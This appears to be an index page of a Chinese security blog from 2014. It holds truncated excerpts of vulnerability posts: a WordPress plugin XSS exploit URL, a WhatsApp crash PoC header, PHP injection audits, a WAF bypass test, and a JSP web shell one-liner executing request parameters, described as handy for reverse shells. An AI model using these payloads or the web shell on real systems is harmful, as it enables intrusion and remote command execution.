admin 发布于 2014-12-30 08:05
$ echo @alunos.dcc.fc.up|sed 's/^/up201407890/g;s/$/.pt/g'
I have found what it appears to be a buffer overflow on the a2p (awk2perl)
utility. It comes by default on several diffe...
admin 发布于 2014-12-29 06:35
Description:
------------
Reported by Stefan Esser <stefan.esser@sektioneins.de>:
A while ago the function "process_nested_data" was changed to better
handle objec...
admin 发布于 2014-12-29 06:26
Software Link: https://wordpress.org/plugins/frontend-uploader/
Exploit :
http://TARGET/[forntEndUploaderPage]=59&errors[fu-disallowed-mime-type][0][name]=XSS...
admin 发布于 2014-12-29 05:44
特殊字符crash,poc如下
#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.wha...
admin 发布于 2014-12-28 08:11
需要register_globals=on。
/include/common.inc.php 注册变量的代码:
foreach(array('_GET','_POST') as $_request)
{
foreach($$_request as $_k => $_v)
{
if(st...
admin 发布于 2014-12-23 04:46
/wei/js.php中
if($type=='hot'||$type=='com'||$type=='new'||$type=='lastview'||$type=='like')
{
if($f_id)
{
if(is_numeric($f_id)){
$SQL=...
admin 发布于 2014-12-23 04:36
phpok4.2.083,刚下的
1.safekey固定,导致加密函数可逆
2.使用固定的safekey加密后发起攻击请求,加密内容在代码中解密,绕过了过滤
/install/index.php中
$content = file_get_contents(ROOT."config.php");
//查...
admin 发布于 2014-12-21 07:56
最近在做特征的时候发现IPS的检测中往往会有一个最大检测长度,譬如IPS最大检测长度可能于数据包的个数或则数据流的长度有关。于是乎就想着做了个测试,测试安全狗的检测是否也会有长度的限制,于是乎就有了此篇帖子。
测试步骤:
1:使用wamp搭建一个web环境,并且安装最新版本的安全狗,3.1.0.9833.
2:下面就开始测试了,我使用python书...
admin 发布于 2014-12-18 02:11
一:执行系统命令:
无回显执行系统命令:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
执行之后不会有任何回显,用来反弹个shell很方便。
有回显带密码验证的:...
admin 发布于 2014-12-15 13:07
恶意反向代理的危害以及如何阻止网站被方向代理
首先肯定会占用服务器资源,网站打开速度受影响。
其次,别人通过代理盗用你的网站数据,对用户与不是那么智能的搜索引擎而言,相当于建了一个与你一模一样的站点,那么很有可能你的站点会进搜索引擎沙箱,甚至被降权。
如果被恶意代理的页面,还挂有你的联盟广告(比如Adsense),这就十分危险了,如果有人点击了上面...